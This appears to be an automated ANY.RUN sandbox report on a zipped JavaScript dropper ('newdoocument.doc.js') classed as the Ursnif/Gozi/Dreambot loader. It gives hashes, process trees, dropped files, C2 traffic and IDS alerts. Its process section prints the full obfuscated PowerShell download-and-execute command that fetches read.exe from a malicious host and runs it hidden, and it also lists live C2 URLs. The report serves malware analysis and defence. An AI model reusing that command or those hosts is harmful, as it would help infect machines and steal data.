analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

newdoocument.doc.zip

Full analysis: https://app.any.run/tasks/094758af-defc-4492-a83f-d410f4a24492
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 15, 2019, 02:03:38
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
gozi
ursnif
evasion
dreambot
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

AB1FEB71209A4D65E8B1D831AA9B0660

SHA1:

74F125ACF09826EF9B558139347BE3A7E7CD0053

SHA256:

0272E27E87A8FC252F0B578352AE336CA45F7FCE0BE81739349220734FFFAED8

SSDEEP:

48:9wH6fwm3sxhDZxesPqHzsIfZw2z2Lqkq4lIGUHtDGC7VM8ZiWcdG:us3snDZxesyHzDwWQjq4lKwZdG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 368)
    • Detected URSNIF Trojan

      • TempoZg18.exe (PID: 3704)
    • Application was dropped or rewritten from another process

      • TempoZg18.exe (PID: 3704)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 4056)
    • Changes the autorun value in the registry

      • explorer.exe (PID: 252)
    • URSNIF Shellcode was detected

      • explorer.exe (PID: 252)
    • Runs injected code in another process

      • TempoZg18.exe (PID: 3704)
    • Application was injected by another process

      • explorer.exe (PID: 252)
    • Connects to CnC server

      • explorer.exe (PID: 252)
  • SUSPICIOUS

    • Executes scripts

      • WinRAR.exe (PID: 2688)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4056)
    • Creates files in the user directory

      • powershell.exe (PID: 4056)
      • TempoZg18.exe (PID: 3704)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2288)
      • explorer.exe (PID: 252)
    • Checks for external IP

      • nslookup.exe (PID: 2940)
    • Runs Chrome without HTTP2 support

      • explorer.exe (PID: 252)
      • chrome.exe (PID: 4068)
  • INFO

    • Application launched itself

      • chrome.exe (PID: 4068)
    • Reads settings of System Certificates

      • chrome.exe (PID: 3564)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: newdoocument.doc.js
ZipUncompressedSize: 9419
ZipCompressedSize: 2609
ZipCRC: 0xbdaf35ae
ZipModifyDate: 2019:04:13 20:46:09
ZipCompression: Deflated
ZipBitFlag: -
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
55
Monitored processes
23
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start inject winrar.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe #URSNIF tempozg18.exe no specs #URSNIF explorer.exe cmd.exe no specs nslookup.exe cmd.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2688"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\newdoocument.doc.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2288"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa2688.34301\newdoocument.doc.js" C:\Windows\System32\WScript.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
368"C:\Windows\System32\cmd.exe" /c WZyogGXBYAVORlS & p^owEr^she^lL.e^Xe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://instant-payments.ru/read.exe','%temp%oZg18.exe'); & start %temp%oZg18.exe & oRpKVOlCIauTiPDC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4056powErshelL.eXe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://instant-payments.ru/read.exe','C:\Users\admin\AppData\Local\TempoZg18.exe'); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3704C:\Users\admin\AppData\Local\TempoZg18.exe C:\Users\admin\AppData\Local\TempoZg18.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
252C:\Windows\Explorer.EXEC:\Windows\explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3052cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\admin\AppData\Local\Temp\B3F2.bi1"C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2940nslookup myip.opendns.com resolver1.opendns.com C:\Windows\system32\nslookup.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
nslookup
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2208cmd /C "echo -------- >> C:\Users\admin\AppData\Local\Temp\B3F2.bi1"C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4068"C:\Program Files\Google\Chrome\Application\chrome.exe" --use-spdy=off --disable-http2C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
3221225547
Version:
73.0.3683.75
Total events
996
Read events
814
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
62
Text files
144
Unknown types
13

Dropped files

PID
Process
Filename
Type
4056powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9TZ1TIVKGYST00QHAM1O.temp
MD5:
SHA256:
3704TempoZg18.exeC:\Users\admin\AppData\Roaming\Microsoft\Devivmgr\crypptsp.exe
MD5:
SHA256:
3052cmd.exeC:\Users\admin\AppData\Local\Temp\B3F2.bi1
MD5:
SHA256:
2208cmd.exeC:\Users\admin\AppData\Local\Temp\B3F2.bi1
MD5:
SHA256:
252explorer.exeC:\Users\admin\AppData\Local\Temp\47CB.bin
MD5:
SHA256:
4068chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
MD5:
SHA256:
4068chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
MD5:
SHA256:
4068chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
MD5:
SHA256:
4068chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2
MD5:
SHA256:
4068chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
42
DNS requests
23
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
252
explorer.exe
GET
194.204.25.137:80
http://adonis-medicine.at/images/aAAXdjNd8XFYE7CaRQTIX/k47qGr7P4TmBYYAb/poeZNnhNek34dZI/9iH_2F2lVRlGJ9z27P/OgzxQ_2BV/wmsKWs6ShjmiGV6_2F68/Q0oPnxXsFt3H5TZuC9h/GD6FuSakOaFgzeoOibWbh9/CpKsrTgFQQPFg/LzTibgwe/dGQcRDvjnLo_2Bj_2B_2B2B/GjCIsClVgH83MkfIfa/E1.gif
EE
malicious
252
explorer.exe
POST
194.204.25.137:80
http://adonis-medicine.at/images/95UWeuAUyI4VZnuZf05ZJ_/2BfCu5IqaGkXg/xoT2s2NE/URLUS9QDe_2Ff1RPIbHnzeH/RZsaZp612j/nTepBXIJBrBuQNcbS/hjOLIkmV8EEK/NfPTFCI7ccO/fgEXHEcUvQ4VjP/dnn_2B_2FovY0GBSrlIb1/gxcOpwqn9azMzq3u/TJvV_2BfKvoJR73/f21YxSnUBLLh2MEz3E/gJ2E0wDne/KGPgJF9d_2B46/lPHq.bmp
EE
malicious
3564
chrome.exe
GET
302
172.217.16.206:80
http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvMjJlQUFXRC12Ny1ldUFnMXF3SDlXZDlFZw/7319.128.0.1_pkedcjkdefgpdelpbcmbmeomcjbeemfm.crx
US
html
507 b
whitelisted
4056
powershell.exe
GET
200
181.39.233.180:80
http://instant-payments.ru/read.exe
EC
executable
502 Kb
malicious
3564
chrome.exe
GET
200
194.9.24.113:80
http://r6---sn-5uh5o-f5fd.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvMjJlQUFXRC12Ny1ldUFnMXF3SDlXZDlFZw/7319.128.0.1_pkedcjkdefgpdelpbcmbmeomcjbeemfm.crx?cms_redirect=yes&mip=212.7.217.54&mm=28&mn=sn-5uh5o-f5fd&ms=nvh&mt=1555293801&mv=m&pl=21&shardbypass=yes
PL
crx
842 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3564
chrome.exe
216.58.206.14:443
clients1.google.com
Google Inc.
US
whitelisted
3564
chrome.exe
216.58.205.228:443
www.google.com
Google Inc.
US
whitelisted
252
explorer.exe
194.204.25.137:80
instant-payments.ru
Elisa Eesti AS
EE
suspicious
2940
nslookup.exe
208.67.222.222:53
resolver1.opendns.com
OpenDNS, LLC
US
malicious
4056
powershell.exe
181.39.233.180:80
instant-payments.ru
Telconet S.A
EC
suspicious
3564
chrome.exe
172.217.22.35:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
3564
chrome.exe
172.217.16.141:443
accounts.google.com
Google Inc.
US
suspicious
3564
chrome.exe
172.217.18.3:443
www.gstatic.com
Google Inc.
US
whitelisted
3564
chrome.exe
172.217.16.206:80
chrome.google.com
Google Inc.
US
whitelisted
3564
chrome.exe
172.217.21.227:443
ssl.gstatic.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
instant-payments.ru
  • 181.39.233.180
  • 186.87.135.97
  • 89.45.19.18
  • 62.73.70.146
  • 91.201.175.46
  • 194.204.25.137
  • 86.101.230.109
  • 80.80.165.93
  • 84.54.187.24
  • 196.20.111.10
malicious
11totalzaelooop11.club
unknown
resolver1.opendns.com
  • 208.67.222.222
shared
222.222.67.208.in-addr.arpa
unknown
myip.opendns.com
  • 212.7.217.54
shared
adonis-medicine.at
  • 194.204.25.137
  • 86.101.230.109
  • 80.80.165.93
  • 84.54.187.24
  • 196.20.111.10
  • 181.39.233.180
  • 186.87.135.97
  • 89.45.19.18
  • 62.73.70.146
  • 91.201.175.46
malicious
clientservices.googleapis.com
  • 172.217.22.35
whitelisted
www.google.com
  • 216.58.205.228
whitelisted
accounts.google.com
  • 172.217.16.141
shared
clients1.google.com
  • 216.58.206.14
whitelisted

Threats

PID
Process
Class
Message
4056
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2940
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
2940
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
252
explorer.exe
A Network Trojan was detected
ET TROJAN Ursnif Variant CnC Beacon
252
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
252
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP
252
explorer.exe
A Network Trojan was detected
ET TROJAN Ursnif Variant CnC Data Exfil
252
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
252
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP
4 ETPRO signatures available at the full report
No debug info